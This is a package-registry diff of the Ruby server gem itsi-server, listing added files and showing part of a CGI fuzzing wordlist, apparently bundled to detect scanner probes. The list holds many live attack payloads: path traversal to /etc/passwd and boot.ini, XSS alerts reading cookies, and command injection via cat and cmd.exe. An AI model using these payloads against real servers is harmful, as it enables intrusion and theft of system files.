itsi-server 0.1.19 → 0.1.20

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (174) hide show
  1. checksums.yaml +4 -4
  2. data/Cargo.lock +950 -239
  3. data/README.md +2 -0
  4. data/exe/itsi +5 -5
  5. data/ext/itsi_acme/Cargo.toml +86 -0
  6. data/ext/itsi_acme/examples/high_level.rs +63 -0
  7. data/ext/itsi_acme/examples/high_level_warp.rs +52 -0
  8. data/ext/itsi_acme/examples/low_level.rs +87 -0
  9. data/ext/itsi_acme/examples/low_level_axum.rs +66 -0
  10. data/ext/itsi_acme/src/acceptor.rs +81 -0
  11. data/ext/itsi_acme/src/acme.rs +354 -0
  12. data/ext/itsi_acme/src/axum.rs +86 -0
  13. data/ext/itsi_acme/src/cache.rs +39 -0
  14. data/ext/itsi_acme/src/caches/boxed.rs +80 -0
  15. data/ext/itsi_acme/src/caches/composite.rs +69 -0
  16. data/ext/itsi_acme/src/caches/dir.rs +106 -0
  17. data/ext/itsi_acme/src/caches/mod.rs +11 -0
  18. data/ext/itsi_acme/src/caches/no.rs +78 -0
  19. data/ext/itsi_acme/src/caches/test.rs +136 -0
  20. data/ext/itsi_acme/src/config.rs +172 -0
  21. data/ext/itsi_acme/src/https_helper.rs +69 -0
  22. data/ext/itsi_acme/src/incoming.rs +142 -0
  23. data/ext/itsi_acme/src/jose.rs +161 -0
  24. data/ext/itsi_acme/src/lib.rs +142 -0
  25. data/ext/itsi_acme/src/resolver.rs +59 -0
  26. data/ext/itsi_acme/src/state.rs +424 -0
  27. data/ext/itsi_server/Cargo.toml +3 -3
  28. data/ext/itsi_server/src/ruby_types/itsi_http_request.rs +2 -2
  29. data/ext/itsi_server/src/ruby_types/itsi_server/itsi_server_config.rs +150 -19
  30. data/ext/itsi_server/src/ruby_types/itsi_server.rs +1 -0
  31. data/ext/itsi_server/src/server/binds/listener.rs +34 -29
  32. data/ext/itsi_server/src/server/binds/tls/locked_dir_cache.rs +2 -2
  33. data/ext/itsi_server/src/server/binds/tls.rs +1 -1
  34. data/ext/itsi_server/src/server/middleware_stack/middleware.rs +33 -28
  35. data/ext/itsi_server/src/server/middleware_stack/middlewares/auth_jwt.rs +56 -3
  36. data/ext/itsi_server/src/server/middleware_stack/middlewares/csp.rs +179 -0
  37. data/ext/itsi_server/src/server/middleware_stack/middlewares/mod.rs +25 -2
  38. data/ext/itsi_server/src/server/middleware_stack/middlewares/ruby_app.rs +3 -3
  39. data/ext/itsi_server/src/server/middleware_stack/middlewares/static_assets.rs +2 -1
  40. data/ext/itsi_server/src/server/middleware_stack/mod.rs +32 -34
  41. data/ext/itsi_server/src/server/serve_strategy/cluster_mode.rs +10 -4
  42. data/ext/itsi_server/src/server/serve_strategy/single_mode.rs +30 -7
  43. data/ext/itsi_server/src/server/thread_worker.rs +2 -2
  44. data/ext/itsi_server/src/services/static_file_server.rs +30 -28
  45. data/ext/itsi_tracing/src/lib.rs +39 -8
  46. data/lib/itsi/server/config/config_helpers.rb +93 -0
  47. data/lib/itsi/server/config/dsl.rb +81 -33
  48. data/lib/itsi/server/config/known_paths/KitchensinkDirectories.txt +2346 -0
  49. data/lib/itsi/server/config/known_paths/Randomfiles.txt +24 -0
  50. data/lib/itsi/server/config/known_paths/UnixDotfiles.txt +52 -0
  51. data/lib/itsi/server/config/known_paths/backdoors/ASP_CommonBackdoors.txt +29 -0
  52. data/lib/itsi/server/config/known_paths/backdoors/bot_control_panels.txt +1668 -0
  53. data/lib/itsi/server/config/known_paths/backdoors/shells.txt +1167 -0
  54. data/lib/itsi/server/config/known_paths/cgi/CGI_HTTP_POST.txt +7 -0
  55. data/lib/itsi/server/config/known_paths/cgi/CGI_HTTP_POST_Windows.txt +6 -0
  56. data/lib/itsi/server/config/known_paths/cgi/CGI_Microsoft.txt +79 -0
  57. data/lib/itsi/server/config/known_paths/cgi/CGI_XPlatform.txt +3948 -0
  58. data/lib/itsi/server/config/known_paths/cms/README.md +5 -0
  59. data/lib/itsi/server/config/known_paths/cms/drupal_plugins.txt +6320 -0
  60. data/lib/itsi/server/config/known_paths/cms/drupal_themes.txt +828 -0
  61. data/lib/itsi/server/config/known_paths/cms/joomla_plugins.txt +224 -0
  62. data/lib/itsi/server/config/known_paths/cms/joomla_themes.txt +30 -0
  63. data/lib/itsi/server/config/known_paths/cms/php-nuke.txt +2142 -0
  64. data/lib/itsi/server/config/known_paths/cms/wordpress.txt +1566 -0
  65. data/lib/itsi/server/config/known_paths/cms/wp_common_theme_files.txt +46 -0
  66. data/lib/itsi/server/config/known_paths/cms/wp_plugins.txt +13366 -0
  67. data/lib/itsi/server/config/known_paths/cms/wp_plugins_full.txt +68662 -0
  68. data/lib/itsi/server/config/known_paths/cms/wp_plugins_top225.txt +225 -0
  69. data/lib/itsi/server/config/known_paths/cms/wp_themes.readme +12 -0
  70. data/lib/itsi/server/config/known_paths/cms/wp_themes.txt +7336 -0
  71. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/3CharExtBrute.txt +17576 -0
  72. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/CommonWebExtensions.txt +80 -0
  73. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/Extensions.Backup.txt +14 -0
  74. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/Extensions.Common.txt +865 -0
  75. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/Extensions.Compressed.txt +186 -0
  76. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/Extensions.Mostcommon.txt +30 -0
  77. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/Extensions.Skipfish.txt +93 -0
  78. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/WordlistSkipfish.txt +1918 -0
  79. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/copy_of.txt +8 -0
  80. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-large-directories-lowercase.txt +56180 -0
  81. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-large-directories.txt +62290 -0
  82. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-large-extensions-lowercase.txt +2367 -0
  83. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-large-extensions.txt +2450 -0
  84. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-large-files-lowercase.txt +35323 -0
  85. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-large-files.txt +37037 -0
  86. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-large-words-lowercase.txt +107982 -0
  87. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-large-words.txt +119600 -0
  88. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-medium-directories-lowercase.txt +26593 -0
  89. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-medium-directories.txt +30009 -0
  90. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-medium-extensions-lowercase.txt +1233 -0
  91. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-medium-extensions.txt +1289 -0
  92. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-medium-files-lowercase.txt +16243 -0
  93. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-medium-files.txt +17128 -0
  94. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-medium-words-lowercase.txt +56293 -0
  95. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-medium-words.txt +63087 -0
  96. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-small-directories-lowercase.txt +17776 -0
  97. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-small-directories.txt +20122 -0
  98. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-small-extensions-lowercase.txt +914 -0
  99. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-small-extensions.txt +963 -0
  100. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-small-files-lowercase.txt +10848 -0
  101. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-small-files.txt +11424 -0
  102. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-small-words-lowercase.txt +38267 -0
  103. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/raft-small-words.txt +43003 -0
  104. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/spanish.txt +445 -0
  105. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/test_demo.txt +36 -0
  106. data/lib/itsi/server/config/known_paths/filename-dirname-bruteforce/upload_variants.txt +44 -0
  107. data/lib/itsi/server/config/known_paths/login-file-locations/Logins.txt +71 -0
  108. data/lib/itsi/server/config/known_paths/login-file-locations/cfm.txt +294 -0
  109. data/lib/itsi/server/config/known_paths/login-file-locations/html.txt +295 -0
  110. data/lib/itsi/server/config/known_paths/login-file-locations/jsp.txt +294 -0
  111. data/lib/itsi/server/config/known_paths/login-file-locations/php.txt +294 -0
  112. data/lib/itsi/server/config/known_paths/login-file-locations/windows-asp.txt +294 -0
  113. data/lib/itsi/server/config/known_paths/login-file-locations/windows-aspx.txt +294 -0
  114. data/lib/itsi/server/config/known_paths/password-file-locations/Passwords.txt +47 -0
  115. data/lib/itsi/server/config/known_paths/php/PHP.txt +30 -0
  116. data/lib/itsi/server/config/known_paths/php/PHP_CommonBackdoors.txt +5 -0
  117. data/lib/itsi/server/config/known_paths/proxy-conf.txt +31 -0
  118. data/lib/itsi/server/config/known_paths/tftp.txt +79 -0
  119. data/lib/itsi/server/config/known_paths/webservers-appservers/ADFS.txt +86 -0
  120. data/lib/itsi/server/config/known_paths/webservers-appservers/AdobeXML.txt +16 -0
  121. data/lib/itsi/server/config/known_paths/webservers-appservers/Apache.txt +101 -0
  122. data/lib/itsi/server/config/known_paths/webservers-appservers/ApacheTomcat.txt +47 -0
  123. data/lib/itsi/server/config/known_paths/webservers-appservers/Apache_Axis.txt +16 -0
  124. data/lib/itsi/server/config/known_paths/webservers-appservers/ColdFusion.txt +111 -0
  125. data/lib/itsi/server/config/known_paths/webservers-appservers/FatwireCMS.txt +390 -0
  126. data/lib/itsi/server/config/known_paths/webservers-appservers/Frontpage.txt +38 -0
  127. data/lib/itsi/server/config/known_paths/webservers-appservers/HP_System_Mgmt_Homepage.txt +239 -0
  128. data/lib/itsi/server/config/known_paths/webservers-appservers/HTTP_POST_Microsoft.txt +2 -0
  129. data/lib/itsi/server/config/known_paths/webservers-appservers/Hyperion.txt +578 -0
  130. data/lib/itsi/server/config/known_paths/webservers-appservers/IIS.txt +187 -0
  131. data/lib/itsi/server/config/known_paths/webservers-appservers/JBoss.txt +5 -0
  132. data/lib/itsi/server/config/known_paths/webservers-appservers/JRun.txt +13 -0
  133. data/lib/itsi/server/config/known_paths/webservers-appservers/JavaServlets_Common.txt +3 -0
  134. data/lib/itsi/server/config/known_paths/webservers-appservers/Joomla_exploitable.txt +1937 -0
  135. data/lib/itsi/server/config/known_paths/webservers-appservers/LotusNotes.txt +206 -0
  136. data/lib/itsi/server/config/known_paths/webservers-appservers/Netware.txt +18 -0
  137. data/lib/itsi/server/config/known_paths/webservers-appservers/Oracle9i.txt +60 -0
  138. data/lib/itsi/server/config/known_paths/webservers-appservers/OracleAppServer.txt +192 -0
  139. data/lib/itsi/server/config/known_paths/webservers-appservers/README.md +6 -0
  140. data/lib/itsi/server/config/known_paths/webservers-appservers/Ruby_Rails.txt +121 -0
  141. data/lib/itsi/server/config/known_paths/webservers-appservers/SAP.txt +463 -0
  142. data/lib/itsi/server/config/known_paths/webservers-appservers/Sharepoint.txt +1707 -0
  143. data/lib/itsi/server/config/known_paths/webservers-appservers/SiteMinder.txt +19 -0
  144. data/lib/itsi/server/config/known_paths/webservers-appservers/SunAppServerGlassfish.txt +51 -0
  145. data/lib/itsi/server/config/known_paths/webservers-appservers/SuniPlanet.txt +35 -0
  146. data/lib/itsi/server/config/known_paths/webservers-appservers/Vignette.txt +73 -0
  147. data/lib/itsi/server/config/known_paths/webservers-appservers/Weblogic.txt +160 -0
  148. data/lib/itsi/server/config/known_paths/webservers-appservers/Websphere.txt +366 -0
  149. data/lib/itsi/server/config/known_paths/wellknown-rfc5785.txt +30 -0
  150. data/lib/itsi/server/config/known_paths.rb +17 -0
  151. data/lib/itsi/server/config/middleware/_index.md +54 -0
  152. data/lib/itsi/server/config/middleware/log_requests.md +63 -0
  153. data/lib/itsi/server/config/middleware/log_requests.rb +33 -0
  154. data/lib/itsi/server/config/middleware.rb +9 -0
  155. data/lib/itsi/server/config/option.rb +9 -0
  156. data/lib/itsi/server/config/options/_index.md +36 -0
  157. data/lib/itsi/server/config/options/fiber_scheduler.md +35 -0
  158. data/lib/itsi/server/config/options/fiber_scheduler.rb +18 -0
  159. data/lib/itsi/server/config/options/threads.md +39 -0
  160. data/lib/itsi/server/config/options/threads.rb +17 -0
  161. data/lib/itsi/server/config/options/workers.md +43 -0
  162. data/lib/itsi/server/config/options/workers.rb +17 -0
  163. data/lib/itsi/server/config/typed_struct.rb +203 -0
  164. data/lib/itsi/server/config.rb +124 -30
  165. data/lib/itsi/server/signal_trap.rb +5 -1
  166. data/lib/itsi/server/typed_handlers/source_parser.rb +1 -1
  167. data/lib/itsi/server/version.rb +1 -1
  168. data/lib/itsi/server.rb +27 -6
  169. data/lib/ruby_lsp/itsi/addon.rb +64 -48
  170. metadata +141 -5
  171. data/CHANGELOG.md +0 -10
  172. data/CODE_OF_CONDUCT.md +0 -139
  173. data/LICENSE.txt +0 -21
  174. data/_index.md +0 -6
@@ -0,0 +1,3948 @@
1
+ # fuzz inside cgi directories - on windows, this is usually /scripts /bin /cgi or /cgi-bin, on unix, usually /cgi-bin /cgi or /nph-cgi
2
+ 14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
3
+ 14all.cgi?cfg=../../../../../../../../etc/passwd
4
+ 666%0a%0a<script>alert('Vulnerable');</script>666.jsp
5
+ 852566C90012664F
6
+ </etc/passwd>
7
+ <script>alert('Vulnerable')</script>
8
+ <script>alert('Vulnerable')</script>.aspx
9
+ <script>alert('Vulnerable')</script>.jsp
10
+ <script>alert('Vulnerable')</script>.shtm
11
+ <script>alert('Vulnerable')</script>.shtml
12
+ <script>alert('Vulnerable')</script>.stm
13
+ <script>alert('Vulnerable')</script>.thtml
14
+ ?D=A
15
+ ?M=A
16
+ ?N=D
17
+ ?Open
18
+ ?OpenServer
19
+ ?PageServices
20
+ ?S=A
21
+ ?\"><script>alert('Vulnerable');</script>
22
+ ?mod=<script>alert(document.cookie)</script>&op=browse
23
+ ?mod=node&nid=some_thing&op=view
24
+ ?mod=some_thing&op=browse
25
+ ?pattern=/etc/*&sort=name
26
+ ?sql_debug=1
27
+ ?wp-cs-dump
28
+ ADMINconfig.php
29
+ ASP/cart/database/metacart.mdb
30
+ AT-admin.cgi
31
+ AT-generate.cgi
32
+ Admin/
33
+ Admin_files/
34
+ Admin_files/order.log
35
+ Administration/
36
+ Agent/
37
+ Agentes/
38
+ Agents/
39
+ Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
40
+ AnyBoard.cgi
41
+ AnyForm
42
+ AnyForm2
43
+ Asp/
44
+ BACLIENT
45
+ Backup/add-passwd.cgi
46
+ C
47
+ CFIDE/administrator/index.cfm
48
+ CFIDE/probe.cfm
49
+ COM
50
+ CSMailto.cgi
51
+ CSMailto/CSMailto.cgi
52
+ CSNews.cgi
53
+ CVS/Entries
54
+ Cgitest.exe
55
+ Citrix/ICAWEB/
56
+ Citrix/MetaFrameXP/default/login.asp
57
+ Citrix/PNAgent/
58
+ Config1.htm
59
+ Count.cgi
60
+ DB4Web/10.10.10.10:100
61
+ DC
62
+ DCFORM
63
+ DCFORMS98.CGI
64
+ DCShop/auth_data/auth_user_file.txt
65
+ DCShop/orders/orders.txt
66
+ DEASAppDesign.nsf
67
+ DEASLog.nsf
68
+ DEASLog01.nsf
69
+ DEASLog02.nsf
70
+ DEASLog03.nsf
71
+ DEASLog04.nsf
72
+ DEASLog05.nsf
73
+ DEESAdmin.nsf
74
+ DMR/
75
+ Data/settings.xml+
76
+ DomainFiles/*//../../../../../../../../../../etc/passwd
77
+ EXE/
78
+ Excel/
79
+ File
80
+ FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
81
+ FileSeek.cgi?head=&foot=;cat%20/etc/passwd
82
+ FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
83
+ FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
84
+ FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
85
+ FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
86
+ FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
87
+ FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
88
+ FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
89
+ FormMail.cgi?<script>alert(\
90
+ FormMail.pl
91
+ GW5/GWWEB.EXE
92
+ GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
93
+ GW5/GWWEB.EXE?HELP=bad-request
94
+ GWWEB.EXE?HELP=bad-request
95
+ Gozila.cgi
96
+ HyperStat/stat_what.log
97
+ IBMWebAS/
98
+ IBMWebAS/apidocs/
99
+ IBMWebAS/configDocs/
100
+ IBMWebAS/docs/
101
+ IBMWebAS/mbeanDocs/
102
+ IDSWebApp/IDSjsp/Login.jsp
103
+ ISSamples/SQLQHit.asp
104
+ ISSamples/sqlqhit.asp
105
+ IlohaMail/blank.html
106
+ ImageFolio/admin/admin.cgi
107
+ JUNK(10)
108
+ JUNK(10)abcd.html
109
+ JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//--
110
+ JUNK(223)<font%20size=50>DEFACED<!--//--
111
+ JUNK(5).csp
112
+ JUNK(5).htw
113
+ JUNK(5).xml
114
+ JUNK(5)/
115
+ JUNK(6).cfm?mode=debug
116
+ LOGIN.PWD
117
+ LWGate
118
+ LWGate.cgi
119
+ LiveHelp/
120
+ MIDICART/midicart.mdb
121
+ MSword/
122
+ MWS/HandleSearch.html?searchTarget=test&B1=Submit
123
+ Mem/dynaform/FileExplorer.htm
124
+ Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000
125
+ MsmMask.exe
126
+ MsmMask.exe?mask=/junk334
127
+ Msword/
128
+ NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
129
+ NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
130
+ NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
131
+ NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
132
+ NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
133
+ NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
134
+ NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
135
+ NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
136
+ NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
137
+ NULL.printer
138
+ NetDetector/middle_help_intro.htm
139
+ NetDynamic/
140
+ NetDynamics/
141
+ OA_HTML/
142
+ OA_HTML/META-INF/
143
+ OA_HTML/PTB/ECXOTAPing.htm
144
+ OA_HTML/PTB/ICXINDEXBASECASE.htm
145
+ OA_HTML/PTB/mwa_readme.htm
146
+ OA_HTML/PTB/xml_sample1.htm
147
+ OA_HTML/_pages/
148
+ OA_HTML/jsp/
149
+ OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc
150
+ OA_HTML/jsp/fnd/fndhelputil.jsp
151
+ OA_HTML/jsp/fnd/fndversion.jsp
152
+ OA_HTML/jsp/por/services/login.jsp
153
+ OA_HTML/jsp/wf/WFReassign.jsp
154
+ OA_HTML/oam/
155
+ OA_HTML/oam/weboam.log
156
+ OA_HTML/webtools/doc/index.html
157
+ OA_JAVA/
158
+ OA_JAVA/Oracle/
159
+ OA_JAVA/oracle/forms/registry/Registry.dat
160
+ OA_JAVA/servlet.zip
161
+ OA_MEDIA/
162
+ OpenFile.aspx?file=../../../../../../../../../../boot.ini
163
+ OpenTopic
164
+ Orders/order_log.dat
165
+ Orders/order_log_v12.dat
166
+ PDG_Cart/
167
+ PDG_Cart/oder.log
168
+ PDG_Cart/shopper.conf
169
+ PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
170
+ PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00
171
+ POSTNUKEMy_eGallery/public/displayCategory.php
172
+ PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
173
+ PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
174
+ Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>
175
+ Pages/
176
+ Pbcgi.exe
177
+ ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found
178
+ Program%20Files/
179
+ README
180
+ README.TXT
181
+ ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
182
+ SGB_DIR/superguestconfig
183
+ SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
184
+ SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
185
+ SQLQHit.asp
186
+ SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
187
+ SUNWmc/htdocs/
188
+ SUNWmc/htdocs/en_US/
189
+ Search
190
+ SetSecurity.shm
191
+ SilverStream
192
+ SilverStream/Meta/Tables/?access-mode=text
193
+ Site/biztalkhttpreceive.dll
194
+ SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
195
+ SiteScope/htdocs/SiteScope.html
196
+ SiteServer/Admin/commerce/foundation/DSN.asp
197
+ SiteServer/Admin/commerce/foundation/domain.asp
198
+ SiteServer/Admin/commerce/foundation/driver.asp
199
+ SiteServer/Admin/knowledge/dsmgr/default.asp
200
+ SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp
201
+ SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
202
+ SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp
203
+ SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp
204
+ SiteServer/Admin/knowledge/persmbr/VsTmPr.asp
205
+ SiteServer/Admin/knowledge/persmbr/vs.asp
206
+ SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>
207
+ SiteServer/Publishing/ViewCode.asp
208
+ SiteServer/admin/
209
+ SiteServer/admin/findvserver.asp
210
+ Sites/Knowledge/Membership/Inspired/ViewCode.asp
211
+ Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
212
+ Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
213
+ Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
214
+ Sites/Samples/Knowledge/Push/ViewCode.asp
215
+ Sites/Samples/Knowledge/Search/ViewCode.asp
216
+ Sources/
217
+ Statistics/
218
+ Stats/
219
+ StoreDB/
220
+ Survey/Survey.Htm
221
+ TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
222
+ USER/CONFIG.AP
223
+ Upload.pl
224
+ VBZooM/add-subject.php
225
+ Vs
226
+ VsSetCookie.exe?
227
+ W
228
+ WEB-INF./web.xml
229
+ WEB-INF/web.xml
230
+ WEBAGENT/CQMGSERV/CF-SINFO.TPF
231
+ WINDMAIL.EXE?%20-n%20c:\boot.ini%
232
+ WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\
233
+ WS_FTP.LOG
234
+ WS_FTP.ini
235
+ WebAdmin.dll?View=Logon
236
+ WebCacheDemo.html
237
+ WebShop/
238
+ WebShop/logs/cc.txt
239
+ WebShop/templates/cc.txt
240
+ WebSphereSamples
241
+ WebTrend/
242
+ Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
243
+ Web_store/
244
+ Webnews.exe
245
+ XMBforum/buddy.php
246
+ XMBforum/member.php
247
+ XSQLConfig.xml
248
+ Xcelerate/LoginPage.html
249
+ YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc
250
+ YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
251
+ YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
252
+ YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script>
253
+ [SecCheck]/..%252f..%252f../ext.ini
254
+ [SecCheck]/..%255c..%255c../ext.ini
255
+ [SecCheck]/..%2f../ext.ini
256
+ \"><img%20src=\"javascript:alert(document.domain)\">
257
+ _cti_pvt/
258
+ _head.php
259
+ _layouts/alllibs.htm
260
+ _layouts/settings.htm
261
+ _layouts/userinfo.htm
262
+ _mem_bin/
263
+ _mem_bin/FormsLogin.asp
264
+ _mem_bin/auoconfig.asp
265
+ _mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>
266
+ _mem_bin/remind.asp
267
+ _pages
268
+ _pages/_demo/
269
+ _pages/_demo/_sql/
270
+ _pages/_webapp/_admin/_showjavartdetails.java
271
+ _pages/_webapp/_admin/_showpooldetails.java
272
+ _pages/_webapp/_jsp/
273
+ _private/
274
+ _private/_vti_cnf/
275
+ _private/form_results.htm
276
+ _private/form_results.html
277
+ _private/form_results.txt
278
+ _private/orders.htm
279
+ _private/orders.txt
280
+ _private/register.htm
281
+ _private/register.txt
282
+ _private/registrations.htm
283
+ _private/registrations.txt
284
+ _vti_bin/
285
+ _vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
286
+ _vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
287
+ _vti_bin/CGImail.exe
288
+ _vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
289
+ _vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
290
+ _vti_bin/_vti_aut/dvwssr.dll
291
+ _vti_bin/_vti_aut/fp30reg.dll
292
+ _vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
293
+ _vti_bin/_vti_cnf/
294
+ _vti_bin/admin.pl
295
+ _vti_bin/cfgwiz.exe
296
+ _vti_bin/contents.htm
297
+ _vti_bin/fpadmin.htm
298
+ _vti_bin/fpcount.exe
299
+ _vti_bin/fpcount.exe/
300
+ _vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
301
+ _vti_bin/fpremadm.exe
302
+ _vti_bin/fpsrvadm.exe
303
+ _vti_bin/shtml.dll/_vti_rpc
304
+ _vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
305
+ _vti_bin/shtml.exe/_vti_rpc
306
+ _vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
307
+ _vti_bin/shtml.exe/junk_nonexistant.exe
308
+ _vti_cnf/_vti_cnf/
309
+ _vti_inf.html
310
+ _vti_log/_vti_cnf/
311
+ _vti_pvt/access.cnf
312
+ _vti_pvt/administrators.pwd
313
+ _vti_pvt/authors.pwd
314
+ _vti_pvt/botinfs.cnf
315
+ _vti_pvt/bots.cnf
316
+ _vti_pvt/deptodoc.btr
317
+ _vti_pvt/doctodep.btr
318
+ _vti_pvt/linkinfo.cnf
319
+ _vti_pvt/service.cnf
320
+ _vti_pvt/service.pwd
321
+ _vti_pvt/services.cnf
322
+ _vti_pvt/services.org
323
+ _vti_pvt/svacl.cnf
